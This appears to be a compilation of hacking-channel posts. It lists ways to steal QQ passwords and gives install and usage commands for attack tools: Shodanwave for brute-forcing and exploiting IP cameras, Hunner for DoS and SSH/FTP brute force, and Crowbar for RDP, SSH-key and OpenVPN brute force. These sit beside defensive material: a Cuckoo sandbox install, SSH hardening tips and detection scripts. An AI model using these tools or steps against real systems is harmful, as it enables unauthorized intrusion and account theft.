🦑Several methods of hacking:
1️⃣ tx database
The tx database has been leaked, and the password is looked up in the leaked database.
2️⃣ Intranet capture
Sometimes sniffing and capturing packets on the internal network can also intercept the password. Xiaofeng has not tested this against QQ, but it now seems unlikely to work.
3️⃣ Phishing
Phishing software, phishing websites, etc. imitate the official ones to entice users to enter their account password, which is then sent to the server.
(Have you ever seen a message on someone else's QQ space message board such as "Why are your photos in other people's space?" followed by a URL? Clicking it opens a disguised space page that asks you to log in. Once you log in, your space will automatically send out countless ads.)
4️⃣ Social engineering
The password combination is derived from what is known about the user.
5️⃣ Remote control
The remote-control program comes online and records keystrokes.
6️⃣ Brute force cracking
Generally aimed at weak passwords; strong passwords are not easily cracked.
7️⃣ Ask him directly.
This method is simple and rude. Of course, the other party's reaction may also be simple and rude.
8️⃣ Account appeal
A form of social engineering that requires all kinds of creative tricks to obtain all kinds of information.
9️⃣ Disguised security center mail
(If an email sent to your security mailbox asks you to fill in the verification code you just received, it must be fake.)
SHARE US
WRITTEN BY
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
🦑Powerful web hacking tool, rooted Termux / any Linux:
FEATURES:
- Real platform independence. Tested on Windows, Linux, BSD and OS X.
- No native library dependencies. All of the framework has been written in pure Python.
- Good performance when compared with other frameworks written in Python and other scripting languages.
- Very easy to use.
- Plugin development is extremely simple.
- The framework also collects and unifies the results of well known tools: sqlmap, xsser, openvas, dnsrecon, theharvester...
- Integration with standards: CWE, CVE and OWASP.
INSTALLATION & RUN:
```
sudo bash
apt-get install python2.7 python2.7-dev python-pip python-docutils git perl nmap sslscan
cd /opt
git clone https://github.com/golismero/golismero.git
cd golismero
pip install -r requirements.txt
pip install -r requirements_unix.txt
ln -s "${PWD}/golismero.py" /usr/bin/golismero
exit
```
🦑If you have an API key for Shodan, or an OpenVAS server or SpiderFoot server you want to integrate with GoLismero, run the following commands:
```
mkdir ~/.golismero
touch ~/.golismero/user.conf
chmod 600 ~/.golismero/user.conf
nano ~/.golismero/user.conf
```
At the editor, add the following sections to the file, as appropriate:
```
[shodan:Configuration]
apikey = <INSERT YOUR SHODAN API KEY HERE>

[openvas]
host = <INSERT THE OPENVAS HOST HERE>
user = <INSERT THE OPENVAS USERNAME HERE>
password = <INSERT THE OPENVAS PASSWORD HERE>

[spiderfoot]
url = <INSERT THE SPIDERFOOT URL HERE>
```
🦑This command will launch GoLismero with all default options and show the report on standard output:
```
golismero scan <target>
```
> If you omit the default command "scan", GoLismero is smart enough to figure out what you're trying to do, so this works too:
```
golismero <target>
```
> You can also set a name for your audit with --audit-name:
```
golismero scan <target> --audit-name <name>
```
> And you can produce reports in different file formats. The format is guessed from the file extension, and you can write as many files as you want:
```
golismero scan <target> -o <output file name>
```
🦑SOME IP ATTACKS #DEFINITIONS
> Hide server IP
Using CDN acceleration can hide the real IP of the server, so that the attacker cannot attack the real IP. This only stops some attackers, though, unless the real IP is truly hidden.
> Prohibit proxy access
As mentioned earlier, the attacker attacks through a large number of proxies. Prohibiting proxy access or limiting the number of proxy connections can also provide a certain amount of protection.
> Shield attack IP
Thousands of TCP connections usually appear on the server during a CC attack. Open cmd and enter netstat -an. If a large number of external IPs appear, you are under attack. At this point you can use protective software to block the attacking IPs or block them manually. This method is often used, but it is passive.
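The netstat check described above can be turned into a per-source count. This is an added example, not part of the original post: the function names, the threshold of 20 and the sample output (built from documentation address ranges) are assumptions made for illustration.

```python
"""Count TCP connections per remote IP from `netstat -an` output."""
from collections import Counter

# States that occupy a connection slot on the server during a flood.
ACTIVE_STATES = {"ESTABLISHED", "SYN_RECEIVED", "SYN_RECV", "TIME_WAIT"}


def split_endpoint(endpoint):
    """Split 'host:port' into (host, port); handles '[v6]:port' and ':::80'."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), port


def parse_tcp_rows(netstat_text):
    """Yield (local_port, remote_host, state) for every TCP row.

    Works for the Windows layout (Proto Local Foreign State) and the Linux
    layout (Proto Recv-Q Send-Q Local Foreign State), because the last three
    columns are the same in both.
    """
    for line in netstat_text.splitlines():
        cols = line.split()
        if len(cols) < 4 or not cols[0].lower().startswith("tcp"):
            continue  # headers, blank lines, UDP rows
        _, local_port = split_endpoint(cols[-3])
        remote_host, _ = split_endpoint(cols[-2])
        if local_port.isdigit():
            yield int(local_port), remote_host, cols[-1].upper()


def connections_per_remote(netstat_text, service_ports=(80, 443)):
    """Count inbound connections to the served ports, grouped by remote IP."""
    counts = Counter()
    for local_port, remote_host, state in parse_tcp_rows(netstat_text):
        # Filtering on the local port drops the server's own outbound traffic.
        if local_port in service_ports and state in ACTIVE_STATES:
            counts[remote_host] += 1
    return counts


def heavy_hitters(netstat_text, threshold=20, service_ports=(80, 443)):
    """Return [(ip, count)] for sources at or above the threshold, busiest first."""
    counts = connections_per_remote(netstat_text, service_ports)
    return [(ip, n) for ip, n in counts.most_common() if n >= threshold]


def build_sample():
    """Constructed `netstat -an` output: two noisy sources among normal clients."""
    rows = [
        "Active Connections",
        "",
        "  Proto  Local Address          Foreign Address        State",
        "  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING",
        "  TCP    192.0.2.10:80          198.51.100.7:50101     ESTABLISHED",
        "  TCP    192.0.2.10:80          198.51.100.7:50102     TIME_WAIT",
        "  TCP    192.0.2.10:443         198.51.100.23:41000    ESTABLISHED",
        "  TCP    192.0.2.10:52311       198.51.100.99:443      ESTABLISHED",
        "  TCP    [2001:db8::10]:80      [2001:db8::beef]:40000 ESTABLISHED",
        "  UDP    0.0.0.0:53             *:*",
    ]
    rows += ["  TCP    192.0.2.10:80          203.0.113.50:%d     ESTABLISHED" % p
             for p in range(30000, 30045)]
    rows += ["  TCP    192.0.2.10:443         203.0.113.77:%d     SYN_RECEIVED" % p
             for p in range(40000, 40025)]
    return "\n".join(rows)


SAMPLE_NETSTAT = build_sample()

if __name__ == "__main__":
    for ip, n in heavy_hitters(SAMPLE_NETSTAT):
        print("%-15s %d connections" % (ip, n))
```

If the server sits behind a CDN or reverse proxy, the remote addresses seen here are the proxy's own, so the same counting has to be done on the client address recorded in the web server's access log instead.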
🦑#Fasttip: Network configuration - find a computer's IP based on its NETBIOS name (special old bios versions):
1️⃣ Use nmblookup test to find the IP of the machine with the NETBIOS name "test" on the same network. If this machine has multiple IPs, they are all listed.
2️⃣ My Linux crashed in yesterday's sudden power failure.
When I boot it again, I cannot enter KDE.
What should I do?
fsck -s -y /
fsck -s -y /var
fsck -s -y /usr
🦑HACK CAM IP WAY 3 (SEARCH FOR WAY 2-1 ON @UndercodeTesting)
> Termux-Linux 2020 tool:
Shodanwave is a tool for exploring and obtaining information from cameras, specifically Netwave IP cameras. The tool uses a search engine called Shodan that makes it easy to search for cameras online.
🦑What does the tool do? Look, a list!
> Search
> Brute force
> SSID and WPAPSK Password Disclosure
> E-mail, FTP, DNS, MSN Password Disclosure
> Exploit
INSTALLATION & RUN:
1️⃣ git clone https://github.com/jimywork/shodanwave.git
2️⃣ $ cd /opt/
3️⃣ $ git clone https://github.com/fbctf/shodanwave.git
4️⃣ $ cd shodanwave
5️⃣ $ pip install -r requirements.txt
6️⃣ python shodanwave.py -u usernames.txt -w passwords.txt -k Shodan API key --t OUTPUT
python shodanwave.py --help
7️⃣ Required if using a proxy: modify your tsocks config.
> Add/Modify the following at the bottom:
server =
server_type = <4 or 5>
server_port =
default_pass = (Might be required for proxy)
8️⃣ Shodan API: search engine for Internet-connected devices.
https://www.shodan.io/
Requests: HTTP for Humans
http://docs.python-requests.org/en/master/
Netwave Exploit: Netwave IP Camera - Password Disclosure
https://www.exploit-db.com/exploits/41236/
🦑What is VNC?
We recently posted how to hack RDP; this time it is about VNC. #Definition
1️⃣ VNC (Virtual Network Computing) is a system for remote access to a computer desktop using the RFB (Remote FrameBuffer) protocol. Control is carried out by transmitting keystrokes and mouse movements from one computer to another and relaying the contents of the screen over a computer network. In simple terms, using VNC you can connect to another computer and work on it as if you were sitting in front of it.
2️⃣ In terms of use, VNC is an analog of RDP (Remote Desktop Protocol). RDP is associated primarily with Windows, since it was initially distributed with this operating system, while VNC is more associated with Linux. However, the clients and servers of both technologies are cross-platform. RDP software (both server and client) is preinstalled on Windows, but you must enable the service to use it. VNC software is written by third-party developers, so you must install it before using it. The most popular VNC clients and servers are free and open source.
3️⃣ One of the significant advantages of VNC over RDP is that it does not require the user who is logged on to the remote system to log out of their session. That is, the user in front of the computer and the user on VNC can work simultaneously. Several users can connect at once via VNC, which is impossible with RDP.
4️⃣ The VNC system is platform independent: a VNC client, called a VNC viewer, running on one operating system can connect to a VNC server running on any other OS. There are client and server implementations for almost all operating systems. Multiple clients can connect to one VNC server at the same time. The most popular uses of VNC are remote technical support and access to a work computer from home.
🦑#FASTTIP: the following log formats and values are supported for the --log-format option:
COMBINED - combined log format,
VCOMBINED - combined log format with a virtual host,
COMMON - common log format,
VCOMMON - common log format with a virtual host,
W3C - extended W3C log format,
SQUID - Squid's native log format,
CLOUDFRONT - Amazon CloudFront Web Distribution,
CLOUDSTORAGE - Google Cloud Storage,
AWSELB - Amazon Elastic Load Balancing,
AWSS3 - Amazon Simple Storage Service (S3)
🦑Hacking framework. This framework is designed to perform penetration testing. Its functions:
> Scan SQL vulnerability
> Scan XSS vulnerability
> DoS sites
> Brute force FTP
> Brute force SSH
> Brute force mail accounts
INSTALLATION & RUN:
1️⃣ git clone https://github.com/b3-v3r/Hunner.git
2️⃣ cd Hunner
3️⃣ python2 hunner.py (choose options via numbers)
4️⃣ To launch only individual hacking modules, run them with python:
> cd modules
banner.py
dos.py
ftp.py
hun_listener.py
mail.py
ssh.py
5️⃣ Includes a password list.
🦑What does that mean?
It simply means that you can throw any suspicious file at it, and in a matter of seconds Cuckoo will give you back detailed results outlining what that file did when executed inside an isolated environment.
INSTALLATION & RUN:
🦑FOR PARROT-KALI:
You can either run Cuckoo as your own user or create a new one dedicated just to your sandbox setup. Make sure that the user that runs Cuckoo is the same user that you will use to create and run the virtual machines (at least in the case of VirtualBox), otherwise Cuckoo won't be able to identify and launch these virtual machines.
1️⃣ git clone https://github.com/cuckoosandbox/cuckoo
or open a terminal and type
$ sudo pip install -U pip setuptools
2️⃣ $ sudo pip install -U cuckoo
3️⃣ $ virtualenv venv
4️⃣ $ . venv/bin/activate
5️⃣ (venv)$ pip install -U pip setuptools
6️⃣ (venv)$ pip install -U cuckoo
🦑Install Cuckoo from file (method 2). You will end up with a file Cuckoo-2.0.0.tar.gz (or a higher number, depending on the latest released stable version) as well as all of its dependencies (e.g., alembic-0.8.8.tar.gz).
1️⃣ DOWNLOAD https://cuckoosandbox.org/
2️⃣ $ pip download cuckoo
3️⃣ $ pip install Cuckoo-2.0.0.tar.gz
4️⃣ $ pip install *.tar.gz
5️⃣ Simply choose an option.
🦑ANONYMOUS VPN/PROXIES 2020
- 7Proxies https://www.7proxies.com/
- AirVPN https://airvpn.org/
- Cryptostorm https://cryptostorm.is/
- Cyberghost https://www.cyberghostvpn.com/en_US/
- ExpressVPN https://www.expressvpn.com
- FreeVPN https://freevpn.me/
- HideMyAss https://www.hidemyass.com/
- IPVanish https://www.ipvanish.com/
- NordVPN https://nordvpn.com
- PIA https://www.privateinternetaccess.com/
- ProtonVPN https://protonvpn.com/
- Proxy.sh https://proxy.sh/
- SlickVPN https://www.slickvpn.com
- StrongVPN https://strongvpn.com/
- TorGuard https://torguard.net/
- TunnelBear https://www.tunnelbear.com/
- VPNBook (default) http://www.vpnbook.com/
- VPNGate http://www.vpngate.net/en/
- VPNKeys https://www.vpnkeys.com/
- VPNMe https://www.vpnme.me/
- Vyprvpn https://www.goldenfrog.com/es/vyprvpn
🦑Get rid of the spy in your own pocket. Make sure the story doesn't repeat itself:
#FastTips
1) Strengthening protection. Create a complex password consisting of numbers and upper- and lower-case letters, and change it regularly. Do not use known data (pet name, date of birth, etc.). Turn off storage and use different passwords for different devices.
2) Reliable sources. Download and install applications only from official sites and markets.
3) Advance action. Install anti-virus programs that can protect your data.
4) Regular cleaning. Create an additional storage space for important files and delete unnecessary ones, including messages.
5) Inbound filter. Do not follow suspicious links or open messages from strangers in your mobile email client.
🦑What is Crowbar?
-Hack OpenVpn
*Crowbar (formerly known as Levye) is a brute forcing tool that can be used during penetration tests. It was developed to brute force some protocols in a different manner from other popular brute forcing tools. As an example, while most brute forcing tools use a username and password for SSH brute force, Crowbar uses SSH key(s). This allows any private keys that have been obtained during penetration tests to be used to attack other SSH servers.
INSTALLATION & RUN:
1️⃣ Kali Linux users can do
# sudo apt install -y crowbar
Otherwise, if you wish to install from source, install all the dependencies:
2️⃣ Debian 9/10+ & Kali Rolling
# sudo apt install -y nmap openvpn freerdp2-x11 tigervnc-viewer python3 python3-pip
3️⃣ Debian 7/8 & Kali 1/2
# sudo apt-get install -y nmap openvpn freerdp-x11 vncviewer
🦑Then get the latest version from GitHub:
1️⃣ git clone https://github.com/galkan/crowbar
2️⃣ cd crowbar/
3️⃣ pip3 install -r requirements.txt
🦑HOW TO USE?
If you want to use a username including DOMAIN, please specify the username as below. Backslash (\) is the escape character for Python, so you have to use either of the following two formats:
1️⃣ ./crowbar.py -b rdp -u DOMAIN\\gokhan alkan -c Aa123456 -s 10.68.35.150/32
2015-03-28 11:03:39 RDP-SUCCESS : 10.68.35.150:3389 - "DOMAIN\gokhan alkan":Aa123456,
2️⃣ ./crowbar.py -b rdp -u gokhan alkan@ornek -c Aa123456 -s 10.68.35.150/32
2015-03-28 11:04:00 RDP-SUCCESS : 10.68.35.150:3389 - "gokhan alkan@DOMAIN":Aa123456,
1️⃣ RDP brute forcing a single IP address using a username list file and a single password:
# ./crowbar.py -b rdp -s 192.168.2.211/32 -U ~/Desktop/userlist -c passw0rd
2️⃣ RDP brute forcing a single IP address using a single username and a password list:
# ./crowbar.py -b rdp -s 192.168.2.250/32 -u localuser -C ~/Desktop/passlist
3️⃣ RDP brute forcing a subnet using a username list and a password list in discovery mode:
# ./crowbar.py -b rdp -s 192.168.2.0/24 -U ~/Desktop/userlist -C ~/Desktop/passlist -d
4️⃣ Brute Forcing - SSH Private Keys
Below are a few examples of using Crowbar.
SSH key brute force attempt against a single IP address using a single username and a single private SSH key:
# ./crowbar.py -b sshkey -s 192.168.2.105/32 -u root -k ~/.ssh/id_rsa
5️⃣ SSH key brute force attempt against a single IP address using a single username and all the SSH keys in a folder:
# ./crowbar.py -b sshkey -s 192.168.2.105/32 -u root -k ~/.ssh/
6️⃣ SSH key brute force attempt against a subnet using a single username and all the SSH keys in a folder in discovery mode:
# ./crowbar.py -b sshkey -s 192.168.2.0/24 -u root -k ~/.ssh/ -d
7️⃣ Brute Forcing - OpenVPN
Below is an example of attacking OpenVPN using Crowbar.
OpenVPN brute force attempt against a single IP address using a configuration file, a single username and a single password, with a specified port number and an optional certificate file. It doesn't matter if it's TCP or UDP:
# grep remote ~/Desktop/vpnbook.ovpn
remote vpn.example.com 1194 udp
# host vpn.example.com | awk '{print $1}'
198.7.62.204
# grep '^auth-user-pass' ~/Desktop/vpnbook.ovpn
# ./crowbar.py -b openvpn -s 198.7.62.204/32 -p 1194 -m ~/Desktop/vpnbook.ovpn -k ~/Desktop/vpnbook_ca.crt -u v
🦑Video tutorial:
https://www.youtube.com/watch?v=4QZAWGsveSM
🦑Downloading the d3dx9_43 file from unauthorized sources is undesirable because:
1) Such sites distribute malicious software or dummy files that simply have the same name as the desired file. Dummy files often lead the user to what seems the only correct decision: completely reinstalling the operating system.
2) Even if you downloaded the file and know which directory to copy it to, this does not mean a 100% solution to the problem. DirectX contains many files, so when you restart, you may encounter a new error with the name of another missing file.
3) If the d3dx9_43 file is incorrectly overwritten in the System32 folder, the system may fail. It can take anywhere from a few hours to a whole day to fix the error and fix the download.
🦑Linux SSH Security Tips
1️⃣ Disable blank passwords
Yes, it is possible to have Linux accounts without any password. If these users try to use SSH, they will not need a password to access the server through SSH either.
This is a security risk, so you must prohibit the use of blank passwords. In the file /etc/ssh/sshd_config, set the PermitEmptyPasswords parameter to no:
PermitEmptyPasswords no
2️⃣ Change the default SSH port
The default SSH port is 22, and most automated scripts are written for that port only. Changing the default SSH port should add an additional layer of security, as the number of attacks (on port 22) can be reduced.
Find the Port line in the configuration file and change it to another value:
Port 2345
3️⃣ Disable root login via SSH
To be honest, working on the server as root should itself be prohibited. It is risky and leaves no audit trail. A mechanism like sudo exists for exactly this reason.
If you have sudo users on your system, use such a sudo user to access the server via SSH instead of root.
You can disable root login by setting the PermitRootLogin parameter as follows:
PermitRootLogin no
4️⃣ Disable SSH protocol 1
This applies if you are using an older Linux distribution. In some older versions of SSH, SSH 1 may still be available. This protocol has known vulnerabilities and should not be used.
In newer versions of SSH, the SSH 2 protocol is enabled automatically, but it does not hurt to double-check:
Protocol 2
5️⃣ Set the idle timeout interval
The idle interval is the time during which an SSH connection can remain open without any activity. Such idle sessions also pose a security risk, so it is recommended that you set an idle interval.
The timeout interval is counted in seconds and defaults to 0. You can change it to 300 to get a five-minute timeout interval:
ClientAliveInterval 300
After this interval, the SSH server sends an alive message to the client. If it does not receive a response, the connection is closed and the end user is logged out.
You can also control how many alive messages it sends before disconnecting:
ClientAliveCountMax 2
6️⃣ Allow SSH access only to selected users
When it comes to security, you must follow the principle of least privilege: do not grant rights when they are not required.
You may have several users on your Linux system. Do you need to allow SSH access to all of them? Probably not.
The approach in this case is to allow SSH access to a selected set of users and thereby deny it to all other users:
AllowUsers User1 User2
You can also add selected users to a new group and allow only this group access to SSH.
AllowGroups sshgroup
You can also use DenyUsers and DenyGroups to restrict SSH access to specific users and groups.
7️⃣ Disable X11 forwarding
X11, or the X display server, is the base platform for graphical environments. X11 forwarding lets you use a GUI application through SSH.
Essentially, the client launches the GUI application on the server, and thanks to X11 forwarding a channel is opened between the two machines so that the GUI application is displayed on the client computer.
The X11 protocol is not security oriented. If you do not need it, you should disable X11 forwarding in SSH:
X11Forwarding no
8️⃣ Automatically mitigate brute-force attacks
To prevent SSH attacks, you can use a security tool such as Fail2Ban.
Fail2Ban checks for failed login attempts from different IP addresses. If these failed attempts cross a threshold within a set period of time, it bans that IP address from accessing SSH for a certain period of time.
You can customize all of these options to suit your preferences and requirements.
9️⃣ Disable password-based SSH login
No matter how much you try, you will always see failed login attempts via SSH on your Linux server. Attackers are smart, and the scripts they use often account for the default settings of Fail2Ban-like tools.
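One way to check a server against the settings in the tips above, as an added example that is not part of the original post: it reads sshd_config text the way sshd resolves the global section (the first value for a keyword wins, repeated Port/AllowUsers/AllowGroups lines accumulate) and reports deviations. The function names, the upstream OpenSSH defaults in the table and the sample config are assumptions of this example.

```python
import re

# keyword -> (upstream OpenSSH default, pass predicate, setting from the tips)
RULES = {
    "permitemptypasswords": ("no", lambda v: v == "no", "PermitEmptyPasswords no"),
    "port": ("22", lambda v: "22" not in v.split(), "Port other than 22"),
    "permitrootlogin": ("prohibit-password", lambda v: v == "no", "PermitRootLogin no"),
    "clientaliveinterval": ("0", lambda v: v.isdigit() and 0 < int(v) <= 300, "ClientAliveInterval 300"),
    "clientalivecountmax": ("3", lambda v: v.isdigit() and int(v) <= 2, "ClientAliveCountMax 2"),
    "x11forwarding": ("no", lambda v: v == "no", "X11Forwarding no"),
}
ACCUMULATE = {"port", "allowusers", "allowgroups"}  # repeated lines add up

def parse_sshd_config(text):
    """Global section only: stops at the first Match block, ignores Include."""
    seen = {}
    for line in map(str.strip, text.splitlines()):
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)
        if line.startswith("#") or len(parts) < 2:
            continue
        key, value = parts[0].lower(), parts[1].strip().lower()
        if key == "match":
            break
        if key in ACCUMULATE and key in seen:
            seen[key] += " " + value
        seen.setdefault(key, value)  # otherwise sshd keeps the first value it reads
    return seen

def audit(text):
    """Return findings for settings that differ from the tips' recommendations."""
    conf = parse_sshd_config(text)
    findings = [f"{key}={conf.get(key, default)} (want: {want})"
                for key, (default, ok, want) in RULES.items()
                if not ok(conf.get(key, default))]
    if "allowusers" not in conf and "allowgroups" not in conf:
        findings.append("no AllowUsers/AllowGroups restriction")
    return findings

# Constructed sample: the later "PermitRootLogin no" line is ignored by sshd.
SAMPLE = """\
PermitRootLogin yes
Port 2345
X11Forwarding yes
ClientAliveInterval 300
PermitRootLogin no
"""

if __name__ == "__main__":
    print("\n".join(audit(SAMPLE)))
```

On a live host, `sshd -T` prints the effective configuration, including the Include files and Match blocks that this parser skips.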